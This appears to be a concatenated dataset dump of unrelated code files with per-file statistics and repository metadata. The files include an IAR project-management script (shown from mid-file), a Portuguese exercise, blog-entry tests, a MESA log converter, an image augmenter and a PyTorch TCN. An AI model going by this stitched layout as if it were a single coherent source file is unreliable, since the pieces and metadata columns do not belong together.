Exit("\"" + project_path + "\" is not *.ewp file")
else:
Exit("Can not find: \"" + project_path + "\" file")
# Parse foder and add subfolders and files in XML tree
def ParseFolder(folder_path, parent_node, ignore_list,
start_path_pos, first_entry):
if first_entry:
append_node = AppendNode("group", parent_node,
folder_path.split("/")[-1])
else:
append_node = parent_node
for item in os.listdir(folder_path):
item_path = folder_path + "/" + item
if os.path.isfile(item_path):
path = "$PROJ_DIR$/../source/"
path += "/".join(folder_path.split("/")[start_path_pos:])
path += "/" + item
if ignore_list != None:
if not any(item.endswith(x) for x in ignore_list.split("/")):
AppendNode("file", append_node, path)
else:
AppendNode("file", append_node, path)
else:
sub_node = AppendNode("group", append_node, item)
ParseFolder(item_path, sub_node, ignore_list, start_path_pos, False)
return parent_node
# Append node in XML tree
def AppendNode(node_tag, parent_node, node_name):
tag = etree.Element(node_tag)
parent_node.append(tag)
tag_name = etree.Element("name")
tag_name.text = node_name
tag.append(tag_name)
return tag
# ------------------------------------------------------------------------------
# Clean workspace folder - delete all files and folders except *.eww and *.ewp
# ------------------------------------------------------------------------------
def Clean(workspace_path):
if os.path.isfile(workspace_path):
if workspace_path.endswith(".eww"):
workspace_folder = workspace_path.split("/")[0:-1]
workspace_folder = "/".join(workspace_folder)
for item in os.listdir(workspace_folder):
item_path = workspace_folder + "/" + item
if os.path.isfile(item_path):
if not item.endswith(".eww") and not item.endswith(".ewp"):
try:
os.remove(item_path)
except OSError:
Exit("Can not delete \"" + item_path + "\" file")
else:
try:
shutil.rmtree(item_path, True)
except IOError:
Exit("Can not delete \"" + item_path + "\" folder")
else:
Exit("\"" + workspace_path + "\" is not *.eww file")
else:
Exit("Can not find: \"" + workspace_path + "\" file")
# ------------------------------------------------------------------------------
# Rename workspace with specified name
# ------------------------------------------------------------------------------
def RenameWorkspace(workspace_path, new_workspace_name):
if os.path.isfile(workspace_path):
if workspace_path.endswith(".eww"):
rename_path = workspace_path.split("/")
rename_path[-1] = new_workspace_name + ".eww"
rename_path = "/".join(rename_path)
try:
os.rename(workspace_path, rename_path)
except OSError:
Exit("Can not rename \"" + workspace_path + "\" file")
else:
Exit("\"" + workspace_path + "\" is not *.eww file")
else:
Exit("Can not find: \"" + workspace_path + "\" file")
# ------------------------------------------------------------------------------
# Rename project with specified name
# ------------------------------------------------------------------------------
def RenameProject(project_path, workspace_path, new_project_name):
if os.path.isfile(project_path):
if os.path.isfile(workspace_path):
if project_path.endswith(".ewp"):
if workspace_path.endswith(".eww"):
rename_path = project_path.split("/")
old_project_name = rename_path[-1]
rename_path[-1] = new_project_name + ".ewp"
rename_path = "/".join(rename_path)
try:
os.rename(project_path, rename_path)
except OSError:
Exit("Can non rename \"" + project_path + "\" file")
text_to_replace = "$WS_DIR$\\" + old_project_name
replace_text = "$WS_DIR$\\" + new_project_name + ".ewp"
ReplaceTextInFile(workspace_path, text_to_replace,
replace_text)
else:
Exit("\"" + workspace_path + "\" is not *.eww file")
else:
Exit("\"" + project_path + "\" is not *.ewp file")
else:
Exit("Can not find: \"" + workspace_path + "\" file")
else:
Exit("Can not find: \"" + project_path + "\" file")
# ------------------------------------------------------------------------------
# Common functions
# ------------------------------------------------------------------------------
# Replace text in file
def ReplaceTextInFile(file_name, text_to_replace, replace_text):
if os.path.exists(file_name):
try:
file = open(file_name, "r")
text = file.read()
file.close()
file = open(file_name, "w")
file.write(text.replace(text_to_replace, replace_text))
file.close()
except IOError:
Exit("Can not handle \"" + file_name + "\" file")
else:
Exit("Can not find \"" + file_name + "\" file")
# Copy folder tree
def CopyTree(src, dst, symlinks = False, ignore = None):
if not os.path.exists(dst):
MakeDir(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
try:
shutil.copytree(s, d, symlinks, ignore)
except IOError:
Exit("Can not copy \"" + s + "\" folder")
else:
CopyFile(s, d)
# Make directory
def MakeDir(directory):
try:
os.makedirs(directory)
except OSError:
Exit("Can not create \"" + directory + "\" folder")
# Copy file
def CopyFile(src, dst):
try:
shutil.copy2(src, dst)
except IOError:
Exit("Can not copy \"" + src + "\"")
# Decorate path to next template "folder/subfolder/file.xxx"
def DecoratePath(path):
if path.endswith("/"):
path = "/".join(path.split("/")[0:-1])
if path.startswith("./"):
path = "/".join(path.split("/")[1:])
return path
# Print message and exit
def Exit(exit_message):
print(exit_message)
exit(1)
# ------------------------------------------------------------------------------
# Main
# ------------------------------------------------------------------------------
if __name__ == "__main__":
arg_parser = CreateArgParser()
arg_parser_namespace = arg_parser.parse_args()
# Create command
if arg_parser_namespace.command == "create":
if (arg_parser_namespace.help == True or
arg_parser_namespace.name == None or
arg_parser_namespace.device == None):
Exit(CREATE_HELP_MESSAGE)
else:
Create(arg_parser_namespace.name, arg_parser_namespace.device)
# Add folder command
elif arg_parser_namespace.command == "add_folder":
if (arg_parser_namespace.help == True or
arg_parser_namespace.project_path == None or
arg_parser_namespace.folder_path == None):
Exit(ADD_FOLDER_HELP_MESSAGE)
else:
AddFolder(arg_parser_namespace.project_path,
arg_parser_namespace.folder_path,
arg_parser_namespace.ignore)
# Clean command
elif arg_parser_namespace.command == "clean":
if (arg_parser_namespace.help == True or
arg_parser_namespace.workspace_path == None):
Exit(CLEAN_HELP_MESSAGE)
else:
Clean(arg_parser_namespace.workspace_path)
# Rename workspace command
elif arg_parser_namespace.command == "rename_workspace":
if (arg_parser_namespace.help == True or
arg_parser_namespace.workspace_path == None or
arg_parser_namespace.name == None):
Exit(RENAME_WORKSPACE_HELP_MESSAGE)
else:
RenameWorkspace(arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
# Rename project command
elif arg_parser_namespace.command == "rename_project":
if (arg_parser_namespace.help == True or
arg_parser_namespace.project_path == None or
arg_parser_namespace.workspace_path == None or
arg_parser_namespace.name == None):
Exit(RENAME_PROJECT_HELP_MESSAGE)
else:
RenameProject(arg_parser_namespace.project_path,
arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
# Rename command
elif arg_parser_namespace.command == "rename":
if (arg_parser_namespace.help == True or
arg_parser_namespace.project_path == None or
arg_parser_namespace.workspace_path == None or
arg_parser_namespace.name == None):
Exit(RENAME_HELP_MESSAGE)
else:
RenameProject(arg_parser_namespace.project_path,
arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
RenameWorkspace(arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
# Undefined command
else:
Exit(MAIN_HELP_MESSAGE)
| 38.979367
| 80
| 0.571071
| 3,087
| 28,338
| 5.021056
| 0.108196
| 0.042774
| 0.048774
| 0.019355
| 0.522903
| 0.432129
| 0.379484
| 0.33871
| 0.307355
| 0.271161
| 0
| 0.005298
| 0.260639
| 28,338
| 726
| 81
| 39.033058
| 0.734488
| 0.158374
| 0
| 0.37931
| 0
| 0.002028
| 0.25908
| 0.03552
| 0.004057
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.010142
| 0
| 0.052738
| 0.006085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a57fff444e34ab3085f258b8aa57323a8f86efde
| 1,683
|
py
|
Python
|
Exercicios/Exercicio070.py
|
RicardoMart922/estudo_Python
|
cb595c2a5e5aee568b6afa71b3ed9dd9cb7eef72
|
[
"MIT"
] | null | null | null |
Exercicios/Exercicio070.py
|
RicardoMart922/estudo_Python
|
cb595c2a5e5aee568b6afa71b3ed9dd9cb7eef72
|
[
"MIT"
] | null | null | null |
Exercicios/Exercicio070.py
|
RicardoMart922/estudo_Python
|
cb595c2a5e5aee568b6afa71b3ed9dd9cb7eef72
|
[
"MIT"
] | null | null | null |
# Crie um programa que leia a idade e o sexo de vรกrias pessoas. A cada pessoa cadastrada, o programa deverรก perguntar se o usuรกrio quer ou nรฃo continuar. No final, mostre:
# A) Quantas pessoas tem mais de 18 anos.
# B) Quantos homens foram cadastrados.
# C) Quantas mulheres tem menos de 20 anos.
maisdezoito = 0
qtdmulheres = 0
qtdhomens = 0
idade = 0
opcao = ''
sexo = ''
print('-= Informe a idade e o sexo para o cadastro =-')
while True:
idade = int(input('Idade: '))
if idade > 18:
maisdezoito += 1
while True:
sexo = str(input('Sexo [M/F]: ')).upper()
if sexo == 'M' or sexo == 'F':
if sexo == 'M':
qtdhomens += 1
if sexo == 'F' and idade < 20:
qtdmulheres += 1
break
while True:
opcao = str(input('Quer continuar [S/N]: ')).upper()
if opcao == 'S' or opcao == 'N':
break
if opcao == 'N':
break
if maisdezoito == 0:
print('Nenhuma pessoa com mais de 18 anos foi cadastrada.')
elif maisdezoito == 1:
print('Foi cadastrado uma pessoa com mais de 18 anos.')
else:
print(f'Foi cadastrado {maisdezoito} pessoas com mais de 18 anos.')
if qtdhomens == 0:
print('Nenhum homem foi cadastrado.')
elif qtdhomens == 1:
print('Apenas um homem foi cadastrado.')
else:
print(f'A quantidade de homens cadastrados foi {qtdhomens}.')
if qtdmulheres == 0:
print('Nenhuma mulher com menos de 20 anos foi cadastrada.')
elif qtdmulheres == 1:
print('Apenas uma mulher com menos de 20 anos foi cadastrada.')
else:
print(f'A quantidade de mulheres com menos de 20 anos que foram cadastradas foi {qtdmulheres}.')
| 35.0625
| 172
| 0.62448
| 242
| 1,683
| 4.342975
| 0.322314
| 0.022835
| 0.030447
| 0.045671
| 0.202664
| 0.150333
| 0.066603
| 0.066603
| 0
| 0
| 0
| 0.026677
| 0.265003
| 1,683
| 48
| 173
| 35.0625
| 0.822959
| 0.171717
| 0
| 0.209302
| 0
| 0
| 0.394245
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.232558
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a583106bd0bb53ab734f77ad352678e3fedf5e53
| 3,050
|
py
|
Python
|
tests/test_entry.py
|
anaulin/tasks.py
|
aa05b4194ff6b01061e6842520752da515e625d6
|
[
"MIT"
] | null | null | null |
tests/test_entry.py
|
anaulin/tasks.py
|
aa05b4194ff6b01061e6842520752da515e625d6
|
[
"MIT"
] | 2
|
2020-06-30T20:05:59.000Z
|
2020-08-01T03:42:20.000Z
|
tests/test_entry.py
|
anaulin/tasks.py
|
aa05b4194ff6b01061e6842520752da515e625d6
|
[
"MIT"
] | null | null | null |
import filecmp
import shutil
import tempfile
import os
from .context import entry
TEST_ENTRY = os.path.join(os.path.dirname(__file__), "test_entry.md")
TEST_ENTRY_CONTENT = """
Some content.
## A section in the content
Content that looks like frontmatter:
```
+++
but this is
not really frontmatter
+++
```
More content.
"""
def test_get_toml_and_content():
(toml, content) = entry.get_toml_and_content(TEST_ENTRY)
assert toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["books", "stuff"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4}
}
assert content == TEST_ENTRY_CONTENT
def test_get_toml():
toml = entry.get_toml(TEST_ENTRY)
assert toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["books", "stuff"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4}
}
def test_get_url():
url = entry.get_url("../foo/bar/this-is-the-slug.md")
assert url == "https://anaulin.org/blog/this-is-the-slug/"
url = entry.get_url("this-is-another-slug.md")
assert url == "https://anaulin.org/blog/this-is-another-slug/"
def test_add_to_toml():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.add_to_toml(temp.name, {'new_key': 'new_value'})
new_toml = entry.get_toml(temp.name)
assert new_toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["books", "stuff"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4},
'new_key': 'new_value'
}
def test_add_to_toml_list():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.add_to_toml(temp.name, {'tags': ['new_tag']})
new_toml = entry.get_toml(temp.name)
assert new_toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["new_tag"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4}
}
def test_write_toml():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.write_toml(temp.name, {'new_key': 'new_value'})
(new_toml, new_content) = entry.get_toml_and_content(temp.name)
(_, old_content) = entry.get_toml_and_content(TEST_ENTRY)
assert new_toml == {'new_key': 'new_value'}
assert new_content == old_content
def test_add_syndication_url():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.add_syndication_url(temp.name, "new_url")
assert entry.get_toml(temp.name)["syndication_urls"] == ["new_url"]
entry.add_syndication_url(temp.name, "another_url")
assert entry.get_toml(temp.name)["syndication_urls"] == [
"new_url", "another_url"]
def test_to_slug():
assert entry.to_slug("Some Title: With #1 and Stuff!!") == "some-title-with-1-and-stuff"
| 30.19802
| 92
| 0.635082
| 411
| 3,050
| 4.486618
| 0.177616
| 0.060738
| 0.052061
| 0.069414
| 0.708243
| 0.670282
| 0.602495
| 0.602495
| 0.602495
| 0.537419
| 0
| 0.004193
| 0.218033
| 3,050
| 100
| 93
| 30.5
| 0.768973
| 0
| 0
| 0.363636
| 0
| 0
| 0.300328
| 0.02623
| 0
| 0
| 0
| 0
| 0.155844
| 1
| 0.103896
| false
| 0
| 0.064935
| 0
| 0.168831
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a585ab12f199b6ce2a2bd25bb26ea5865e4f682d
| 9,190
|
py
|
Python
|
nnaps/mesa/compress_mesa.py
|
vosjo/nnaps
|
bc4aac715b511c5df897ef24fb953ad7265927ea
|
[
"MIT"
] | 4
|
2020-09-24T12:55:58.000Z
|
2021-05-19T14:46:10.000Z
|
nnaps/mesa/compress_mesa.py
|
vosjo/nnaps
|
bc4aac715b511c5df897ef24fb953ad7265927ea
|
[
"MIT"
] | 4
|
2021-06-02T09:28:35.000Z
|
2021-06-04T08:32:24.000Z
|
nnaps/mesa/compress_mesa.py
|
vosjo/nnaps
|
bc4aac715b511c5df897ef24fb953ad7265927ea
|
[
"MIT"
] | 3
|
2020-10-05T13:18:27.000Z
|
2021-06-02T09:29:11.000Z
|
import os
from pathlib import Path
import numpy as np
# repack_fields is necessary since np 1.16 as selecting columns from a recarray returns an array with padding
# that is difficult to work with afterwards.
from numpy.lib import recfunctions as rf
from nnaps.mesa import fileio
from nnaps import __version__
def read_mesa_header(model):
"""
process the MESA history files header.
This will require more work in the future to also deal with correct type conversions. Now everything is considered
a string. This is fine as the header is ignored by the rest of nnaps.
todo: implement converting of header values to the correct data types.
:param model: list of lists
:return: numpy array containing strings with the header info.
"""
res = []
for line in model:
new_line = [l.replace('\"', '') for l in line]
res.append(new_line)
return np.array(res, str).T
def read_mesa_output(filename=None, only_first=False):
"""
Read star.log and .data files from MESA.
This returns a record array with the global and local parameters (the latter
can also be a summary of the evolutionary track instead of a profile if
you've given a 'star.log' file.
The stellar profiles are given from surface to center.
Function writen by Pieter DeGroote
:param filename: name of the log file
:type filename: str
:param only_first: read only the first model (or global parameters)
:type only_first: bool
:return: list of models in the data file (typically global parameters, local parameters)
:rtype: list of rec arrays
"""
models = []
new_model = False
header = None
# -- open the file and read the data
with open(filename, 'r') as ff:
# -- skip first 5 lines when difference file
if os.path.splitext(filename)[1] == '.diff':
for i in range(5):
line = ff.readline()
models.append([])
new_model = True
while 1:
line = ff.readline()
if not line:
break # break at end-of-file
line = line.strip().split()
if not line:
continue
# -- begin a new model
if all([iline == str(irange) for iline, irange in zip(line, range(1, len(line) + 1))]):
# -- wrap up previous model
if len(models):
try:
model = np.array(models[-1], float).T
except:
model = read_mesa_header(models[-1])
models[-1] = np.rec.fromarrays(model, names=header)
if only_first: break
models.append([])
new_model = True
continue
# -- next line is the header of the data, remember it
if new_model:
header = line
new_model = False
continue
models[-1].append(line)
if len(models) > 1:
try:
model = np.array(models[-1], float).T
except:
indices = []
for i, l in enumerate(models[-1]):
if len(l) != len(models[-1][0]):
indices.append(i)
for i in reversed(indices):
del models[-1][i]
print("Found and fixed errors on following lines: ", indices)
model = np.array(models[-1], float).T
models[-1] = np.rec.fromarrays(model, names=header)
return models
def get_end_log_file(logfile):
if os.path.isfile(logfile):
# case for models ran locally
ifile = open(logfile)
lines = ifile.readlines()
ifile.close()
return lines[-30:-1]
else:
return []
def convert2hdf5(modellist, star_columns=None, binary_columns=None, profile_columns=None,
add_stopping_condition=True, skip_existing=True,
star1_history_file='LOGS/history1.data', star2_history_file='LOGS/history2.data',
binary_history_file='LOGS/binary_history.data', log_file='log.txt',
profile_files=None, profiles_path='', profile_pattern='*.profile',
input_path_kw='path', input_path_prefix='', output_path=None, verbose=False):
if not os.path.isdir(output_path):
os.mkdir(output_path)
for i, model in modellist.iterrows():
print(input_path_prefix, model[input_path_kw])
if not os.path.isdir(Path(input_path_prefix, model[input_path_kw])):
continue
if skip_existing and os.path.isfile(Path(output_path, model[input_path_kw]).with_suffix('.h5')):
if verbose:
print(i, model[input_path_kw], ': exists, skipping')
continue
if verbose:
print(i, model[input_path_kw], ': processing')
# store all columns of the input file in the hdf5 file
data = {}
extra_info = {}
for col in model.index:
extra_info[col] = model[col]
# obtain the termination code and store if requested
termination_code = 'uk'
if add_stopping_condition:
lines = get_end_log_file(Path(input_path_prefix, model[input_path_kw], log_file))
for line in lines:
if 'termination code' in line:
termination_code = line.split()[-1]
extra_info['termination_code'] = termination_code
# store the nnaps-version in the output data.
extra_info['nnaps-version'] = __version__
data['extra_info'] = extra_info
# check if all history files that are requested are available and can be read. If there is an error,
# skip to the next model
history = {}
if star1_history_file is not None:
try:
d1 = read_mesa_output(Path(input_path_prefix, model[input_path_kw], star1_history_file))[1]
if star_columns is not None:
d1 = rf.repack_fields(d1[star_columns])
history['star1'] = d1
except Exception as e:
if verbose:
print("Error in reading star1: ", e)
continue
if star2_history_file is not None:
try:
d2 = read_mesa_output(Path(input_path_prefix, model[input_path_kw], star2_history_file))[1]
if star_columns is not None:
d2 = rf.repack_fields(d2[star_columns])
history['star2'] = d2
except Exception as e:
if verbose:
print("Error in reading star2: ", e)
continue
if binary_history_file is not None:
try:
d3 = read_mesa_output(Path(input_path_prefix, model[input_path_kw], binary_history_file))[1]
if star_columns is not None:
d3 = rf.repack_fields(d3[binary_columns])
history['binary'] = d3
except Exception as e:
if verbose:
print("Error in reading binary: ", e)
continue
data['history'] = history
# check if profiles exists and store them is requested. Also make a profile lookup table (legend)
profiles = {}
profile_legend = []
profile_name_length = 0 # store longest profile name to create recarray of profile_legend
if profile_files is not None:
if profile_files == 'all':
profile_paths = Path(input_path_prefix, model[input_path_kw], profiles_path).glob(profile_pattern)
else:
profile_paths = [Path(input_path_prefix, model[input_path_kw], profiles_path, p) for p in profile_files]
for filepath in profile_paths:
if not filepath.is_file():
continue
profile_name = filepath.stem
header, profile_data = read_mesa_output(filename=filepath, only_first=False)
if profile_columns is not None:
profile_data = rf.repack_fields(profile_data[profile_columns])
profiles[profile_name] = profile_data
if len(profile_name) > profile_name_length:
profile_name_length = len(profile_name)
profile_legend.append((header['model_number'], profile_name))
if len(profiles.keys()) >= 1:
data['profiles'] = profiles
profile_legend = np.array(profile_legend, dtype=[('model_number', 'f8'),
('profile_name', 'a'+str(profile_name_length))])
data['profile_legend'] = profile_legend
# rather annoying way to assure that Path doesn't cut of part of the folder name when adding the .h5 suffix
# if not this will happen: M1.080_M0.502_P192.67_Z0.01129 -> M1.080_M0.502_P192.67_Z0.h5
output_file = Path(output_path, model[input_path_kw])
output_file = output_file.with_suffix(output_file.suffix + '.h5')
fileio.write2hdf5(data, output_file, update=False)
| 38.291667
| 120
| 0.586507
| 1,159
| 9,190
| 4.482312
| 0.235548
| 0.038114
| 0.027526
| 0.036959
| 0.208277
| 0.192878
| 0.179596
| 0.150337
| 0.110298
| 0.077575
| 0
| 0.015726
| 0.328836
| 9,190
| 239
| 121
| 38.451883
| 0.826524
| 0.214146
| 0
| 0.280255
| 0
| 0
| 0.054008
| 0.003376
| 0
| 0
| 0
| 0.004184
| 0
| 1
| 0.025478
| false
| 0
| 0.038217
| 0
| 0.089172
| 0.044586
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a58a9d34b89b4bc4bc0e0b2929228a0dbbb74a83
| 1,379
|
py
|
Python
|
jakso_ml/training_data/white_balancer.py
|
JaksoSoftware/jakso-ml
|
5720ea557ca2fcf9ae16e329c198acd8e31258c4
|
[
"MIT"
] | null | null | null |
jakso_ml/training_data/white_balancer.py
|
JaksoSoftware/jakso-ml
|
5720ea557ca2fcf9ae16e329c198acd8e31258c4
|
[
"MIT"
] | 3
|
2020-09-25T18:40:52.000Z
|
2021-08-25T14:44:30.000Z
|
jakso_ml/training_data/white_balancer.py
|
JaksoSoftware/jakso-ml
|
5720ea557ca2fcf9ae16e329c198acd8e31258c4
|
[
"MIT"
] | null | null | null |
import random, copy
import cv2 as cv
import numpy as np
from scipy import interpolate
from .augmenter import Augmenter
class WhiteBalancer(Augmenter):
'''
Augmenter that randomly changes the white balance of the SampleImages.
'''
def __init__(
self,
min_red_rand,
max_red_rand,
min_blue_rand,
max_blue_rand,
**kwargs
):
super().__init__(**kwargs)
self.min_red_rand = min_red_rand
self.max_red_rand = max_red_rand
self.min_blue_rand = min_blue_rand
self.max_blue_rand = max_blue_rand
def augment(self, sample):
sample_copy = copy.deepcopy(sample)
b, g, r = cv.split(sample_copy.image)
rand_b = 128 * random.uniform(1 + self.min_blue_rand, 1 + self.max_blue_rand)
rand_r = 0
if rand_b < 1:
rand_r = 128 * random.uniform(1, 1 + self.max_red_rand)
else:
rand_r = 128 * random.uniform(1 + self.min_red_rand, 1)
lut_b = self._create_lut(rand_b)
lut_r = self._create_lut(rand_r)
b = cv.LUT(b, lut_b)
r = cv.LUT(r, lut_r)
sample_copy.image = cv.merge((b, g, r))
return sample_copy
def _create_lut(self, center):
tck = interpolate.splrep([0, 128, 256], [0, center, 256], k = 2)
lut = np.rint(interpolate.splev(range(256), tck, der = 0))
lut = np.where(lut > 255, 255, lut)
lut = np.where(lut < 0, 0, lut)
lut = np.uint8(lut)
return lut
| 25.072727
| 81
| 0.658448
| 224
| 1,379
| 3.78125
| 0.28125
| 0.066116
| 0.047226
| 0.049587
| 0.173554
| 0.088548
| 0
| 0
| 0
| 0
| 0
| 0.040338
| 0.226976
| 1,379
| 54
| 82
| 25.537037
| 0.754221
| 0.050761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0
| 0.121951
| 0
| 0.268293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a590274916afd797594033b1e72a778f82d65211
| 4,415
|
py
|
Python
|
src/algorithms/tcn_utils/tcn_model.py
|
pengkangzaia/mvts-ano-eval
|
976ffa2f151c8f91ce007e9a455bb4f97f89f2c9
|
[
"MIT"
] | 24
|
2021-09-04T08:51:55.000Z
|
2022-03-30T16:45:54.000Z
|
src/algorithms/tcn_utils/tcn_model.py
|
pengkangzaia/mvts-ano-eval
|
976ffa2f151c8f91ce007e9a455bb4f97f89f2c9
|
[
"MIT"
] | 3
|
2021-10-12T02:34:34.000Z
|
2022-03-18T10:37:35.000Z
|
src/algorithms/tcn_utils/tcn_model.py
|
pengkangzaia/mvts-ano-eval
|
976ffa2f151c8f91ce007e9a455bb4f97f89f2c9
|
[
"MIT"
] | 15
|
2021-09-18T03:41:02.000Z
|
2022-03-21T09:03:01.000Z
|
import torch
import torch.nn as nn
from torch.nn.utils import weight_norm
"""TCN adapted from https://github.com/locuslab/TCN"""
class Chomp1d(nn.Module):
def __init__(self, chomp_size):
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
class pad1d(nn.Module):
def __init__(self, pad_size):
super(pad1d, self).__init__()
self.pad_size = pad_size
def forward(self, x):
return torch.cat([x, x[:, :, -self.pad_size:]], dim = 2).contiguous()
class TemporalBlock(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding,
dropout=0.2):
super(TemporalBlock, self).__init__()
self.conv1 = weight_norm(nn.Conv1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.chomp1 = Chomp1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = weight_norm(nn.Conv1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.chomp2 = Chomp1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.conv1, self.chomp1, self.relu1, self.dropout1,
self.conv2, self.chomp2, self.relu2, self.dropout2)
self.downsample = nn.Conv1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalBlockTranspose(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding,
dropout=0.2):
super(TemporalBlockTranspose, self).__init__()
self.conv1 = weight_norm(nn.ConvTranspose1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.pad1 = pad1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = weight_norm(nn.ConvTranspose1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.pad2 = pad1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.dropout1, self.relu1, self.pad1, self.conv1,
self.dropout2, self.relu2, self.pad2, self.conv2)
self.downsample = nn.ConvTranspose1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalConvNet(nn.Module):
def __init__(self, num_inputs, num_channels, kernel_size=2, dropout=0.2):
super(TemporalConvNet, self).__init__()
layers = []
num_levels = len(num_channels)
for i in range(num_levels):
dilation_size = 2 ** i
in_channels = num_inputs if i == 0 else num_channels[i-1]
out_channels = num_channels[i]
layers += [TemporalBlock(in_channels, out_channels, kernel_size, stride=1, dilation=dilation_size,
padding=(kernel_size-1) * dilation_size, dropout=dropout)]
self.network = nn.Sequential(*layers)
def forward(self, x):
return self.network(x)
| 39.070796
| 110
| 0.59479
| 543
| 4,415
| 4.639042
| 0.151013
| 0.03811
| 0.025407
| 0.047638
| 0.630012
| 0.590711
| 0.5526
| 0.529575
| 0.529575
| 0.529575
| 0
| 0.02859
| 0.294904
| 4,415
| 112
| 111
| 39.419643
| 0.780597
| 0
| 0
| 0.505618
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.134831
| false
| 0
| 0.033708
| 0.033708
| 0.280899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a591a1103146cfd95f29ba55d7e7f556a915a79a
| 1,868
|
py
|
Python
|
static/file/2021-04-10/index.py
|
yuguo97/nest-node
|
a3d6cb99005403691779c44a488e3b22f5479538
|
[
"MIT"
] | null | null | null |
static/file/2021-04-10/index.py
|
yuguo97/nest-node
|
a3d6cb99005403691779c44a488e3b22f5479538
|
[
"MIT"
] | null | null | null |
static/file/2021-04-10/index.py
|
yuguo97/nest-node
|
a3d6cb99005403691779c44a488e3b22f5479538
|
[
"MIT"
] | null | null | null |
'''
Author: your name
Date: 2021-04-08 17:14:41
LastEditTime: 2021-04-09 09:13:28
LastEditors: Please set LastEditors
Description: In User Settings Edit
FilePath: \github\test\index.py
'''
